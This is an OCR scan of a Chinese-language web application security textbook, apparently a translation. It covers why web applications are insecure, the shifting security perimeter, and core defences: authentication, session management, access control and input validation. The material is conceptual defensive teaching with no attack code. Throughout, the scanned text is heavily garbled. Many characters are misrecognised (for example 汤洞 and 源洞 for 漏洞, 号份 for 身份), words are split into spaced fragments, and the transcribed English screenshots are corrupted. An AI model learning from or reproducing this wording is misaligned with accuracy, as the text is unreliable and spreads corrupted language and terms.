大 多 数 Web 应 用 程序 都 由 企业 自己 的 员工 或 合作 公司 独立 开发 。 即 使 应 用 程序 采用 第 三 方 组 
件 , 通常 也 是 使 用 新 代码 将 第 三 方 组 件 进行 自 定义 或 拼凑 在 一 起 。 在 这 种 情况 下 ,每 个 应 用 程序 
都 各 不 相同 , 并 且 可 能 包含 其 独 有 的 缺陷 。 这 种 情形 与 组 织 购 买 业内 一 流产 品 并 按照 行业 标准 指 
南安 装 的 典型 基础 架构 部 署 形成 鲜明 对 照 。 

3. 欺骗 性 的 简化 

使 用 今天 的 Web 应 用 程序 和 开发 工具 ， 一 个 程序 员 新 手 也 可 能 在 短期 内 从 头 开始 创建 一 个 强 
大 的 应 用 程序 。 但 是 ,在 编写 功能 性 代码 与 编写 安全 代码 之 间 存在 巨大 的 差异 。 许 多 Web 应 用 程 
序 由 善意 的 个 人 创建 ， 他 们 只 是 缺乏 发 现 安全 问题 的 知识 与 经 验 。 

近年 来 出 现 了 一 种 显著 趋势 , 即使 用 提供 现成 代码 组 件 的 应 用 程序 框架 来 处 理 各 种 常见 的 功 
能 ,这 些 功能 包括 身份 验证 、 页 面 模板 .公告 牌 以 及 与 常用 后 端 基础 架构 组 件 的 集成 ,等 等 -Liferay 
和 Appfuse 就 属于 这 种 类 型 的 框架 。 使 用 这 些 产品 可 以 快速 方便 地 创建 可 运行 的 应 用 程序 ， 而 无 
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须 了 解 这 些 应 用 程序 的 运行 机 制 或 它们 包含 的 潜在 风险 。 这 也 意味 着 许多 公司 会 使 用 相同 的 框 
染 。 因 此 ， 即 使 仅仅 出 现 一 个 漏洞 ， 该 源 洞 也 将 会 影响 许多 无 关 的 应 用 程序 。 

4. 迅速 发 展 的 威胁 形 努 

Web 应 用 程序 攻击 与 防御 研究 发 展 相 对 不 成 熟 ， 是 一 个 正 莲 动 发 展 的 领域 ， 其 中 新 概念 与 威 
胁 出 现 的 速度 比 传统 的 技术 要 快 得 多 。 在 客户 问 方 面 尤其 如 此 ,针对 特定 攻击 的 公认 防御 机 制 往 
往 会 在 一 些 研 究 中 失去 作用 , 这 些 人 研究 最 终 成 就 了 新 的 攻击 拉 巧 。 在 项 目 开始 之 初 就 完全 了 解 了 
当前 威胁 的 开发 团队 ， 很 可 能 到 应 用 程序 开发 完成 并 部 署 后 会 面临 许多 未 知 的 威胁 。 

5. 资源 与 时 间 限 制 

由 于 独立 、 一 次 性 开发 的 影响 ,许多 Web 应 用 程序 开发 项 目 会 受到 严格 的 时 间 与 资源 限制 。 
通 前 ,设计 或 开发 团队 不 可 能 雇用 专职 的 安全 专家 ， 而 且 由 于 项 目 进程 的 拖延 ,往往 要 等 到 项 目 
周期 的 最 后 阶段 才 由 专家 进行 安全 测试 。 为 了 若 顾 各 种 要 系 , 按期 开发 出 稳定 而 实用 的 应 用 程序 
的 要 求 往往 使 开发 团队 忽视 不 明显 的 安全 问题 ,小 型 组 织 一 般 不 愿 多 花 时 日 评估 一 个 新 的 应 用 程 
序 。 快速 渗透 测试 通 肖 只 能 发 现 明 显 的 安全 汤 洞 ， 而 往往 会 遗 源 比较 细微 、 需 要 时 间 和 耐心 来 发 
现 的 源 洞 。 

6. 技术 上 强 其 所 难 

Web 应 用 程序 使 用 的 许多 核心 技术 出 现 于 万 维 网 早期 阶段 ， 那 时 的 状况 与 目前 十 分 不 同 。 从 
那 以 后 ， 其 功能 已 远 远 超越 最 初 的 设想 ， 例 如 ， 在 许多 基于 AJAX 的 应 用 程序 中 使 用 JavaScript 进 
行 数 据 传 输 。 随 春 对 Web 应 用 程序 功能 有 要求 的 变化 ,用 于 实现 这 种 功能 的 技术 已 远 远 洛 后 于 其 发 
展 要 求 ， 而 开发 人 员 还 是 涪 用 原 有 的 技术 来 满足 新 的 需求 。 因 此 , 这 种 做 法 造成 的 安全 漏洞 与 无 
法 预料 的 负面 影响 也 就 不 足 为 奇 卫 。 

7. 对 功能 的 需求 不 断 增强 

在 设计 应 用 程序 时 , 开发 人 员 主 要 考虑 是 的 功能 和 可 用 性 。 曾 经 静态 的 用 户 资 源 现 在 包含 社 
交 网 络 功能 ， 人 允许 用 户 上 传 照片 ， 对 页 面 进行 “维基 ”风格 的 编辑 。 以 前 ， 应 用 程序 设计 人 员 可 
以 仅仅 通过 用 户 名 和 密码 来 创建 登录 功能 ， 而 现今 的 站 点 则 包含 密码 恢复 、 用 户 名 恢复 、 密 码 提 
示 , 以 及 在 将 来 访问 时 记 住 用 户 名 和 密码 的 选项 , 无疑, 这 类 站 扣 声 称 其 能 够 提供 各 种 安全 功能 ， 
但 实际 上 ， 这 些 功 能 不 过 是 增 大 了 该 站 点 的 受 攻击 面 而 已 。 


1.2.4 新 的 安全 边界 


在 Web 应 用 程序 出 现 之 前 ， 主 要 在 网 络 边界 上 抵御 外 部 攻击 。 保 护 这 个 边界 需要 对 其 提供 的 
服务 进行 强化 、 打 补丁 ， 并 在 用 户 访 问 之 间 设 置 防火 墙 。 

Web 应 用 程序 改变 了 这 一 切 。 用 户 要 访问 应 用 程序 ,边界 防火 墙 必须 允许 其 通过 HTTP/HTTPS 
连接 内 部 服务 器 ; 应 用 程序 要 实现 其 功能 ， 必 须 允 许 其 连接 服务 需 以 支持 后 端 系统 ， 如 数据 库 、 
大 型 主机 以 及 金融 与 后 勤 系 统 。 这 些 系 统 通常 处 于 组 织 运营 的 核心 部 分 ， 并 由 几 层 网 络 级 防御 
保护 。 

如 果 Web 应 用 程序 存在 漏洞 ， 那 么 公共 因特网 上 的 攻击 者 只 需 从 Web 浏 览 右 提交 专门 设计 的 
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数据 就 可 攻破 组 织 的 核心 后 端 系 统 。 这些 数据 会 像 传送 至 Web 应 用 程序 的 正常 、 民 性 数据 流 一 样 ， 
穿 透 组 织 的 所 有 网 络 防 御 。 

Web 应 用 程序 的 广泛 应 用 使 得 典型 组 织 的 安全 边界 发 生 了 变化 。 部 分 安全 边界 仍旧 关注 防火 
载 与 防御 主机 ， 但 大 部 分 安全 边界 更 加 关注 组 织 所 使 用 的 Web 应 用 程序 。Web 应 用 程序 接收 用 户 
输入 的 方式 多 种 多 样 , 将 这 些 数据 传送 至 敏感 后 端 系统 的 方式 也 多 种 多 样 , 这 些 都 是 一 系列 攻击 
的 潜在 关口 ， 因 此 必须 在 应 用 程序 内 部 执行 防御 措施 ， 以 阻挡 这 些 攻击 。 即 使 某 个 Web 应 用 程序 
中 的 某 一 行 代 码 存在 缺陷 , 也 会 使 组 织 的 内 部 系统 吻 于 遭受 攻击 。 此 外 , 随 着 “聚合 ”应 用 程序 、 
第 三 方 小 部 件 及 其 他 跨 域 集成 技术 的 出 现 ,服务 檀 端 安全 边界 常 第 会 跨越 组 织 本 号 的 边界 ,而 且 ， 
各 种 组 织 还 让 目地 信任 外 部 应 用 程序 和 服务 。 前 述 有 关 该 新 的 安全 边界 内 漏洞 发 生 几 率 的 统计 效 
据 值 得 每 一 个 组 织 思 考 。 

















注解 ”对 一 个 针对 组 织 的 攻击 者 而 言 ， 获 得 网 络 访问 权 或 在 服务 器 上 执行 任意 命令 可 
能 并 不 是 他 们 真正 想 要 实现 的 目标 。 大 多 数 或 者 基本 上 所 有 攻击 者 的 真实 意图 是 执行 
一 些 应 用 程序 级 行为 ， 如 偷窃 个 人 信息 、 转 账 或 购买 价格 低廉 的 产品 。 而 应 用 程序 层 
面 上 存在 的 安全 问题 对 实现 这 些 目标 有 很 大 帮助 。 

例如 ， 一 名 攻击 者 希望 “ 冯 入 ”银行 系统 ， 从 用 户 的 账户 中 窃取 资金 。 在 银行 使 


用 Web 应 用 程序 之 前 ， 攻 击 者 可 能 需要 发 现 公 共 服 务 中 存在 的 漏洞 ， 并 利用 其 进入 银 
行 的 DMZ， 徊 透 限制 访问 其 内 部 系统 的 防火 墙 ， 在 网 络 上 搜索 确定 大 型 计算 机 ， 破 译 
用 于 访问 它 的 秘 锋 协议 ， 然 后 推测 茶 些 证 书 以 进行 登录 。 但 是 ， 如 果 银 行使 用 为 受 攻 
击 的 Web 应 用 程序 , 那么 攻击 者 可 能 只 需 修改 隐藏 的 HTML 表 单字 段 中 的 一 个 账号 , 就 
可 以 达到 这 一 目的 。 











Web 应 用 程序 安全 边界 发 生变 化 的 万 一 原因 , 在 于 用 户 本 里 在 访问 一 个 易 受 攻击 的 应 用 程序 
时 面临 的 威胁 。 恶 意 攻击 者 可 能 会 利用 一 个 恨 性 但 易 党 攻击 的 Web 应 用 程序 攻击 任何 访问 它 的 用 
户 。 如 采用 户 位 于 企业 内 部 网 络 ,攻击 者 可 能 会 控制 用 尸 的 浏览 齿 ,， 并 从 用 尸 的 可 信 位 置 回 本 地 
网 络 发 动 攻 击 。 如 来 攻击 者 心 存 恶 意 , 他 不 需要 用 户 的 任何 合作 , 就 可 以 代表 用 户 执 行 任何 行为 。 
随 春 浏览 厅 扩 展 扩 术 的 兴起 ， 各 种 择 件 不 断 增 多 ， 客 户 闯 受 攻击 面 的 犯 于 也 明显 变 大 。 

网 络 管理 员 清 楚 如 何 防 止 其 用 户 访问 恶意 的 Web 站 点 ,终端 用 户 也 逐渐 意识 到 这 种 威胁 。 但 
是 ， 鉴 于 Web 应 用 程序 汤 洞 的 本 质 ， 与 一 个 全 然 恶 意 的 Web 站 点 相 比 ， 易 受 攻击 的 应 用 程序 至 少 
给 用 户 及 其 组 织 市 来 了 一 种 威胁 。 因 此 , 新 的 安全 边界 要 求 所 有 应 用 程序 的 所 有 者 承担 保护 其 用 
户 的 责任 ， 使 他 们 免 受 通过 应 用 程序 传送 的 攻击 。 

此 外 ,人 们 普遍 采用 电子 邮件 作为 一 种 补充 验证 机 制 ,安全 边界 在 一 定 程度 上 问 客 户 问 转移 。 
当前 ,大量 应 用 程序 部 包含 “起 记 密 人 码 ”功能 ,攻击 者 可 以 利用 该 功能 向 任何 注册 地 址 发 送 账 户 
恢复 电子 邮件 , 而 无 须 任 何其 他 用 户 特 定 的 信息 。 因此, 如 末 攻 击 者 攻破 了 用 户 的 Web 邮 件 账户 ， 
就 可 以 轻松 扩大 攻击 范围 ， 并 攻破 受害 用 户 注册 的 大 多 数 Web 应 用 程序 账户 。 
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1.2.5 ”Web 应 用 程序 安全 的 未 来 


虽然 经 过 约 10 年 的 广泛 应 用 ， 但 目前 因特网 上 的 Web 应 用 程序 仍然 充满 漏洞 。 在 了 解 Web 应 
用 程序 面临 的 安全 威胁 以 及 如 何 有 效应 对 这 些 威胁 方面 , 整个 行业 仍 未 形成 成 束 的 意识 。 目 前 几 
乎 没有 迹象 表明 上 述 问 题 能 够 在 不 远 的 将 来 得 到 解决 。 
也 就 是 说 ，Web 应 用 程序 的 安全 形势 并 非 静 止 不 变 。 尺 管 SQL 注 入 等 询 悉 的 传统 漏洞 还 在 不 
叶 出 现 , 但 已 不 是 主要 问题 。 而且, 现 有 的 漏洞 也 变 得 更 难以 发 现 和 利用 。 儿 年 前 只 需 使 用 浏览 
傣 就 能 够 轻易 探测 与 利用 的 小 源 洞 ， 现 在 需要 花费 大 量 精力 开发 先进 技术 来 发 现 。 
Web 应 用 程序 安全 的 万 一 个 突出 趋势 为 : 攻击 目标 已 由 传统 的 服务 带 闯 应 用 程序 转 回 用 户 
应 用 程序 。 后 一 类 攻击 仍然 害 要 利用 应 用 程序 本 号 的 缺陷 ,但 这 类 攻击 一 般 要 求 与 其 他 用 户 
进行 某 种 形式 的 交互 ， 以 达到 破坏 用 户 与 易 受 攻击 的 应 用 程序 之 间 交 易 的 目的 。 其 他 软件 安 
全 领域 也 同样 存在 这 种 趋势 。 随 看 安全 威胁 意识 的 增强 ， 服 务 硕 闪存 在 的 缺陷 首先 应 为 人 们 
所 理解 并 得 到 解决 ， 从 而 可 以 在 进一步 的 研究 过 程 中 将 注意 力 集中 在 客户 闯 。 本 书 摘 述 的 全 
部 攻击 类 型 中 ， 那 些 针对 其 他 用 户 的 攻击 是 发 展 最 快 的 攻击 类 型 ， 也 是 当前 许多 人 研究 的 焦点 
所 在 。 
技术 领域 的 各 种 最 新 趋势 在 一 定 程度 上 改变 了 Web 应 用 程序 的 安全 状态 。 一 些 极 具 误 导 性 的 
热门 词汇 使 这 些 趋 势 深 入 人 心 ， 下 面 是 一 些 最 热门 的 词汇 。 
口 Web 2.0。 这 一 术语 指 更 大 汇 围 地 采用 实现 用 户 生 成 内 容 和 信息 共 圣 的 功 
种 广泛 文 持 这 一 功能 的 技术 ,包括 寞 步 HTTP 请 求 和 跨 域 集成 。 

口 云 计 算 。 这 一 术语 指 更 多 地 通过 外 部 服务 提供 商 来 实施 拉 术 栈 的 各 个 部 分 , 包括 应 用 程 
序 软件 、 应 用 程序 平台 、Web 服 务 人 软件 、 数 据 库 和 人 硬件 。 它 也 指 在 托管 环境 中 大 量 采 
用 虚拟 化 技术 。 

和 技术 领域 的 大 多 数 变 盏 一 样 ， 这 些 趋 势 也 催生 了 一 些 新 型 攻击 ， 并 导致 现 有 攻击 产生 变 
体 。 虽 然 这 些 趋势 受到 人 们 的 大 肆 追 摊 ， 但 鉴于 其 导致 的 各 种 问题 ， 它 们 并 不 像 人 们 最 初 认 为 
的 那样 会 市 来 题 履 性 的 改变 。 我 们 将 在 本 书 的 相应 部 分 讨论 与 这 些 及 其 他 最 新 趋势 有 关 的 安全 
问题 。 

尽管 Web 应 用 程序 发 生 了 所 有 这 些 改变 , 一 些 典 型 汤 洞 并 未 表现 出 任何 减少 的 迹象 。 它 们 继 
续 出 现 ， 方 式 与 Web 拉 术 发 展 初 期 大 致 相同 。 这 些 漏洞 包括 业务 逻辑 缺陷 、 未 能 正确 应 用 访问 控 
制 以 及 其 他 设计 问题 。 即 使 在 应 用 程序 组 件 芭 密集 成 及 “一 切 篆 服 务 ” 的 时 代 ,， 这 些 问题 仍然 会 
广泛 存在 。 







































































BEB， 以 及 采用 各 
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1.3 小结 


大 约 十 几 年 的 时 间 , 万 维 网 已 由 纯粹 的 静态 信息 仓库 发 展 为 功能 强大 的 应 用 程序 , 能 够 处 理 
敏感 的 数据 并 执行 用 于 输出 实际 结 末 的 高 度 功能 化 的 应 用 程序 。 在 这 个 发 展 过 程 中 , 多 种 因 系 造 
成 了 当前 绝 大 多 数 Web 应 用 程序 所 面临 的 安全 保护 不 足 的 状况 。 
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多 数 应 用 程序 都 面临 一 个 核心 安全 问题 , 即 用 户 可 提交 任意 输入 。 用 户 与 应 用 程序 交互 的 
一 个 方面 都 可 能 是 恶意 的 , 而 且 在 未 能 证 明 其 并 无 恶意 之 前 应 该 被 认定 为 是 恶意 的 。 如 来 这 个 问 
题 处 理 不 当 ,， 应 用 程序 就 有 可 能 受到 各 种 形式 的 攻击 。 

当前 Web 应 用 程序 安全 状况 的 所 有 证 据 表 明 ， 这 个 问题 尚未 得 到 很 好 的 解决 ， 而 且 不 管 是 对 
部 车 Web 应 用 程序 的 组 织 还 是 对 访问 它们 的 用 户 而 言 ， 针 对 Web 应 用 程序 的 攻击 痢 是 一 个 严重 的 
威胁 。 














核心 防御 机 制 








eb 应 用 程序 的 基本 安全 问题 (所 有 用 户 输 入 都 不 可 信 ) 致使 应 用 程序 实施 大 量 安 全 机 
制 来 抵御 攻击 。 尽管 其 设计 细 市 与 执行 效 认可 能 干 差 万 别 , 但 几乎 所 有 应 用 程序 及 用 
的 安全 机 制 在 概念 上 都 具有 相似 性 。 
Web 应 用 程序 采用 的 防御 机 制 由 以 下 几 个 核心 因素 构成 。 
口 处 理 用 户 访问 应 用 程序 的 数据 与 功能 ， 防 止 用 户 获 得 未 授权 访问 。 
口 处 理 用 户 对 应 用 程序 功能 的 输入 ， 防 止 错误 输入 造成 不 良 行 为 。 
口 防范 攻击 者 ， 确 保 应 用 程序 在 成 为 耻 接 攻击 目标 时 能 够 正常 运转 ， 并 采取 适当 的 防御 与 
攻击 措施 挫败 攻击 者 。 
口 管理 应 用 程序 本 身 ， 帮 助 管理 员 监 控 其 行为 ， 配 置 其 功能 。 
鉴于 它们 在 解决 核心 安全 问题 过 程 中 所 发 挥 的 重要 作用 ,一 个 典型 应 用 程序 的 绝 大 多 数 受 攻 
击 面 * 也 由 这 些 机 制 构成 。 知 己 知 彼 是 战争 的 首要 法 则 ， 那 么 防御 攻击 者 向 应 用 程序 发 动 有 效 攻 
击 的 重要 前 提 是 彻底 了 解 这 些 机 制 。 无 论 读者 在 渗透 测试 方面 是 否 有 经 验 , 虱 应 花 时 间 了 解 这 些 
核心 机 制 在 遇 到 的 每 一 种 应 用 程序 中 的 工作 原理 ， 并 确定 使 其 易于 受到 攻击 的 弱点 。 


2.1 处 理 用 忆 访 癌 


几乎 任何 应 用 程序 都 必须 满足 一 个 中 心安 全 要 求 , 即 处 理 用 户 访 问 其 数据 与 功能 。 在 通常 情 
况 下 ， 用 户 一 般 分 为 几 种 类 型 ， 如 匿名 用 户 、 正 和 常 通 过 验证 的 用 户 和 管理 用 户 。 而 且 ， 许多 情况 
下 ,不 同 的 用 户 只 允许 访问 不 同 的 数据 ， 例 如 ，Web 邮 件 应 用 程序 的 用 户 只 能 阅读 自己 的 而 非 他 
人 的 电子 邮件 。 

大 多 数 Web 应 用 程序 使 用 三 层 相 互 关联 的 安全 机 制 处 理 用 户 访问 : 

口 身份 验证 ; 

口 会 话 管理 ; 

口 访问 控制 。 
















































































J 在 软件 环境 中 ， 受 攻击 面 ( attack surface ) 是 指 对 未 通过 验证 的 用 户 的 有 效 功能 ; 也 就 是 说 ,未 通过 验证 的 用 户 通过 软件 
的 默认 配置 能 够 达到 什么 目的 。 详 者 注 
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上 述 每 一 个 机 制 都 是 应 用 程序 受 攻击 面 的 一 个 关键 部 分 , 对 于 应 用 程序 的 总 体 安全 状况 极其 
重要 。 由 于 这 些 机 制 相互 依赖 ,因此 根本 不 能 提供 强大 的 总 体 安全 保护 , 任何 一 个 部 分 存在 缺陷 
都 可 能 使 攻击 者 自由 访问 应 用 程序 的 功能 与 数据 。 


2.1.1 身份 验证 


从 理论 上 说 , 号 份 验证 机 制 是 应 用 程序 处 理 用 户 访问 的 最 基本 机 制 。 验 证 用 户 是 指 确定 用 户 
的 真实 身份 。 如 采 不 采用 这 个 机 制 ， 应 用 程序 会 将 所 有 用 户 作 为 匿名 用 户 对 符 ,， 这 是 最 低 一 级 的 
人 请 全 

今天 ， 绝 大 多 数 Web 应 用 程序 都 米 用 传统 的 里 份 验证 模型 ， 即 要 求 用 户 提交 用 户 名 与 密码 ， 
再 由 应 用 程序 对 其 进行 核实 ,确认 其 合法 性 。 一 种 典型 的 登录 功能 如 图 2-1 所 示 。 在 安全 性 至 关 
重要 的 应 用 程序 ( 如 电子 银行 使 用 的 应 用 程序 ) 中 ,通常 使 用 其 他 证 书 与 多 阶段 登录 过 程 强 化 这 
个 基本 模型 。 在 安全 要 求 更 高 的 情况 下 ， 可 能 需要 基于 客户 病 证 书 、 吞 能 卡 或 质询 -响应 令 牌 
( challenge-response token ) 使 用 其 他 号 份 验证 模型 。 除 核心 登录 过 程 外 ， 吴 份 验证 机 制 往往 还 要 
采取 一 系列 其 他 文 持 功能 ， 如 有 目 我 注册 、 上 账户 恢复 和 密 但 修改 工具 。 


Log in 


Please log in below by completing the details requested, then select Log In' 



























































For security reasons, you have a limited number of attempts to provide the correct information. fyou do 
not provide the correct information, access to your Intelligent Finance plan will be suspended. Ifthis 
happens, please call 0845 609 4343 and we will send you a nevw Plan Security Code. You will then be 
able to access your plan by following the reactivation process. 


Ifyou are not sure about your logyin details or require help, please call us. 


Online Username | ThIs must be at least B characters iong and 


can have Ietters and/ or numpbers, but no 
SPaces. 


Online Password | ThIS must he at least B characters iong and 


must have poth letters and numpbers, put 
no Spaces. 

















尽管 表面 看 似 催 单 ,但 无 论 是 设计 方面 还 是 执行 方面 ， 号 份 验证 机 制 都 存在 大 量 缺 陷 。 和 半 见 
的 问题 可 能 使 得 攻击 者 能 够 确定 其 他 用 户 的 用 户 和 名、 推测 出 他 们 的 密码 ,或 者 利用 其 逻辑 缺陷 完 
全 避 开 登录 功能 。 攻 击 Web 应 用 程序 时 ， 渗 透 测 试 员 应 当 投 入 大 量 精 力 ， 攻 击 应 用 程序 采用 的 各 
种 与 号 份 验证 有 关 的 功能 。 出 人 意料 的 是 , 这 种 功能 中 存在 的 缺陷 往往 允许 攻击 者 非法 访问 敏感 
数据 与 功能 。 











2.1.2 会 话 管理 


处 理 用 户 访 问 的 下 一 项 逻辑 任务 是 管理 通过 验证 用 户 的 会 话 。 成 功 登 录 应 用 程序 后 ,用户 会 
访问 各 种 页 面 与 功能 ， 从 浏览 需 提 出 一 系列 HTTP 请 求 。 与 此 同时 ， 应 用 程序 还 会 收 到 各 类 用 户 
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(包括 通过 验证 的 用 户 与 匿名 用 户 ) 发 出 的 无 数 请 求 。 为 实施 有 效 的 访问 控制 ， 应 用 程序 需要 识 
别 并 处 理 每 一 名 用 户 提交 的 各 种 请 求 。 

为 满足 以 上 要 求 ， 几 乎 所 有 的 Web 应 用 程序 都 为 每 一 位 用 户 建立 一 个 会 话 ， 并 向 用 户 发 布 一 
个 标识 会 话 的 令 牌 。 会 话 本 映 是 一 组 保存 在 服务 需 上 的 数据 结构 , 用 于 追踪 用 户 与 应 用 程序 的 交 
互 状态 。 令 牌 是 一 个 唯一 的 字符 串 ， 应 用 程序 将 其 映射 到 会 话 中 。 当 用 户 收 到 一 个 令 牌 时 ， 浏览 
融会 在 随后 的 HITP 请 求 中 将 它 返 回 给 服务 锅 ， 帮 助 应 用 程序 将 请 求 与 该 用 户 联系 起 来 。 虽 然 许 
多 应 用 程序 使 用 隐藏 表单 字段 (hidden form field ) 或 URL 查 询 字符 串 (query string ) 传送 会 话 令 
牌 〈session token )， 但 HTTP cookie 才 是 实现 这 一 目的 的 稼 规 方 法 。 如 采用 户 在 一 段 时 间 内 没有 
发 出 请 求 ， 会 话 将 会 自动 终止 ， 如 图 2-2 所 示 。 


OUTr ACCOUNT SessSION nas enaec 






































Sorry - for your Own protection we have had to log you out of your online account 
because you did not use the service for more than 10 minutes. To re-enter your account, 
please log in again. 


ould you like to log in now? 


图 2-2 一 个 实施 会 话 超时 的 应 用 程序 


就 受 攻击 面 而 言 , 会 话 管理 机 制 的 有 效 性 基本 上 取决 于 其 令 牌 的 安全 性 , 绝 大 多 数 针对 它 的 
攻击 午 企 图 攻破 其 他 用 户 的 令 牌 。 如 宁 令 牌 锌 攻破 ， 攻 击 者 吕 可 以 伪 次 成 被 攻破 的 用 户 ， 像 已 经 
通过 验证 的 用 户 一 样 使 用 应 用 程序 。 令 牌 生成 过 程 中 存在 的 缺陷 是 主要 的 漏洞 来 源 , 使 攻击 者 能 
够 推测 出 发 布 给 其 他 用 户 的 令 牌 ; 随后， 攻击 者 再 利用 令 牌 中 的 缺陷 截获 其 他 用 尸 的 令 脾 。 

少数 应 用 程序 不 四 用 户 发 布 会 话 令 牌 ， 而 是 通过 其 他 方法 在 多 个 请 求 中 重复 确认 用 户 吴 份 。 
如 采 使 用 HTTP 的 内 置身 份 验证 机 制 ， 那 么 浏览 融会 日 动 在 每 个 请 求 中 重复 提交 用 户 证 书 ， 带 助 
应 用 程序 直接 通 过 这 些 请 求 识别 用 户 。 在 其 他 情况 下 , 应 用 程序 会 将 状态 信息 保存 在 客户 闪 而 非 
服务 上 上 ， 通 稍 还 需要 对 这 些 信 息 进 行 加 密 ， 以 防 遭 到 破坏 。 















































2.1.3 ”访问 控制 


处 理 用 户 访 问 的 最 后 一 个 人 逻辑 步 又 是 做 出 并 实施 正确 的 决策 ， 决 定 允 许 或 拒绝 每 一 个 请 求 。 
如 有 果 前 面 的 机 制 运作 正 第 ,应 用 程序 即 可 从 收 到 的 每 一 个 请 求 确认 用 户 的 号 份 。 在 此 基础 上 ， 应 
用 程序 需要 决定 是 否 授权 用 户 执行 其 所 请 求 的 操作 或 访问 相关 数据 ( 见 图 2-3 )。 

访问 控制 机 制 一 般 需 要 实现 茶 种 糊 心 变 计 的 逻辑 , 并 分 别 考虑 各 种 相关 应 用 程序 领域 与 不 同 
类 型 的 功能 。 应 用 程序 可 文 持 无 数 不 同 的 用 户 角 色 , 每 种 角色 和 客 拥 有 特定 的 权限 ， 每 名 用 户 只 爷 
许 访 问 应 用 程序 中 的 部 分 数据 。 应 用 程序 可 能 需要 根据 用 户 的 号 份 , 通过 特殊 功能 实现 交易 限制 
与 其 他 检查 。 

由 于 典型 访问 控制 的 要 求 相当 复杂 , 因此 这 种 机 制 中 一 般 存 在 大 量 的 安全 漏洞 ,使 得 攻击 者 
能 够 获得 对 应 用 程序 的 数据 与 功能 的 未 授权 访问 ,开发 者 经 常会 对 用 户 瑟 应 用 程序 的 交互 方式 做 
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出 错误 假设 ,并 利 间 会 有 所 距 忽 ,在 东 些 应 用 程序 功能 中 省 略 访问 控制 检查 。 换 碍 这 些 漏 洞 是 一 
件 费 力 的 工作 ， 因 为 逢 要 对 每 一 项 功能 重复 进行 相同 的 检查 。 然而， 因为 访问 控制 机 制 中 存在 大 
量 漏洞 ， 所 以 在 测试 Web 应 用 程序 时 付出 这 样 的 努力 总 是 值得 的 。 第 8 鞋 我 们 会 讲述 在 执行 严格 
的 访问 控制 试 测 时 ， 如 何 将 某 些 操 作 目 动 化 。 





Home”» Access Denied |403 


Access Denied [403] 


We're sorry... 


You are not authorized to access this 9age. 


。 Login to the site. 

es Ifyoutyped the page url, check the spelling. 

。 Click your browsers back button and try another link. 

es Consider telling us about the broken link that led you to this page. 





We apologlze for the inconvenience, and hope we'll see you 3agaln soon. 


图 2-3 ”应 用 程序 正 实施 访问 控制 





2.2 ”处 理 用 户 输入 


回想 一 下 第 1 章 描 述 的 基本 安全 问题 : 所 有 用 户 输入 都 不 可 信 。 大 量 针对 Web 应 用 程序 的 不 
同 攻击 都 与 提交 错误 输入 有 关 , 攻击 者 专门 设计 这 类 输入 , 以 引发 应 用 程序 设计 者 无 法 预料 的 行 
为 。 因 此 ， 能 够 安全 处 理 用 户 输入 是 对 应 用 程序 安全 防御 的 一 个 关键 要 求 。 

应 用 程序 的 每 一 项 功能 以 及 几乎 每 一 种 第 用 的 技术 都 可 能 出 现 输 入 方面 的 漏洞 。 通 党 来 说 ， 
输入 确认 (input validation ) 是 防御 这 些 攻击 的 必要 手段 。 然 而， 任何 一 种 保护 机 制 都 不 是 万 能 
的 ， 防 御 亚 意 输入 也 并 非 如 听 起 来 那样 简单 。 


2.2.1 输入 的 多 样 性 


典型 的 Web 应 用 程序 以 各 种 不 同 的 形式 处 理 用 户 提交 的 数据 。 一 些 类 型 的 输入 确认 可 能 并 不 
适用 或 能 够 确认 所 有 这 些 形式 的 输入 。 通 第 由 用 户 注 册 功 能 执行 的 输入 确认 如 图 2-4 所 示 。 


























First Name 


a Must contain at least 4 characters 


Last Name 
上 a Must contain at least 4 characters 


Email 


上 a Please provide a valid email address 


Phone number 
a Must contain only numbers 








图 2-4 ”应 用 程序 正 执行 输入 确认 
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在 许多 情况 下 ， 应 用 程序 可 能 会 对 一 些 特殊 的 输入 实行 非常 严格 的 确认 检查 。 例如， 提交 给 
登录 功能 的 用 户 名 的 最 大 长 度 为 8 个 字符 ， 且 只 能 包含 字母 。 

在 其 他 情况 下 , 应 用 程序 必须 接受 更 广泛 的 输入 。 例 如 ， 提 交 给 个 人 信息 页 面 的 地 址 字段 可 
合法 包 仿 字母、 数字、 空格 、 连 字符 、 搬 号 与 其 他 字符 。 但 是 仍然 可 以 对 这 个 字段 实施 有 效 的 限 
制 。 例 如 ， 提 交 的 数据 不 得 超过 菏 个 适当 的 长 度 限制 (如 50 个 字符 )， 并 不 得 包含 任何 HTML 标 
记 (HTML markup )。 

有 些 时 候 ， 应 用 程序 可 能 需要 接受 用 户 提交 的 任意 输入 。 例 如 ， 一 名 博客 应 用 程序 用 户 可 
以 建立 一 个 主题 为 “攻击 Web 应 用 程序 ”的 博客 。 博 客 文 草 和 评论 可 合法 包含 所 讨论 的 明确 攻 
击 字符 串 。 应 用 程序 可 能 需要 将 这 些 输入 保存 在 数据 库 中 ， 写 人 磁盘 ， 并 以 安全 的 方式 向 用 户 
显示 。 不 能 仅仅 因为 输入 看 似 恶 意 〈 但 并 未 显著 破坏 应 用 程序 对 一 些 用 户 的 价值 )， 就 拒绝 接受 
该 输入 。 

除了 用 户 通 过 浏览 硕 界 面 提 区 的 各 种 输入 外 , 一 个 典型 的 应 用 程序 还 会 收 到 大 量 数据 , 它们 
在 服务 右上 生成 ,并 被 传送 给 客户 端 ， 以 便 客 户 端 能 够 在 随后 的 请 求 中 将 其 返回 给 服务 磊 。 这 些 
数据 包括 cookie 和 隐藏 表单 字段 ， 普 通 应 用 程序 用 户 虽 然 无 法 浏览 这 些 数据 项 ， 但 攻击 者 能 够 查 
看 并 修改 它们 。 在 这 些 情况 下 , 应 用 程序 通 稼 可 对 接收 到 的 数据 执行 非常 特殊 的 确认 操作 。 例如 ， 
一 个 参数 可 能 必须 包含 一 个 特殊 的 已 知 值 ( 如 说 明 用 户 首 选 语言 的 cookie ), 或 者 为 某 种 特殊 的 格 
式 ( 如 一 个 顾客 的 映 份 证 号 码 ) 而 且 ， 如 采 应 用 程序 发 现 服务 硕 上 生成 的 数据 遭 到 修改 ， 并 且 
使 用 标准 浏览 需 的 普通 用 户 根本 不 可 能 进行 此 类 修改 , 那么 极 有 可 能 是 该 用 户 正 企图 探查 应 用 程 
序 的 漏洞 。 在 这 些 情 况 下 ,应 用 程序 应 拒绝 该 用 户 提交 的 请 求 ， 并 将 事件 记 入 日 志文 件 中 ， 以 便 
随后 进行 调查 〈 请 参阅 2.3 市 了 解 相关 内 容 )。 


2.2.2 ”输入 处 理 方法 


通常 可 采用 各 种 方法 来 处 理 用 户 输入 。 不 同 的 方法 一 般 适 用 于 不 同 的 情形 与 不 同类 型 的 输 
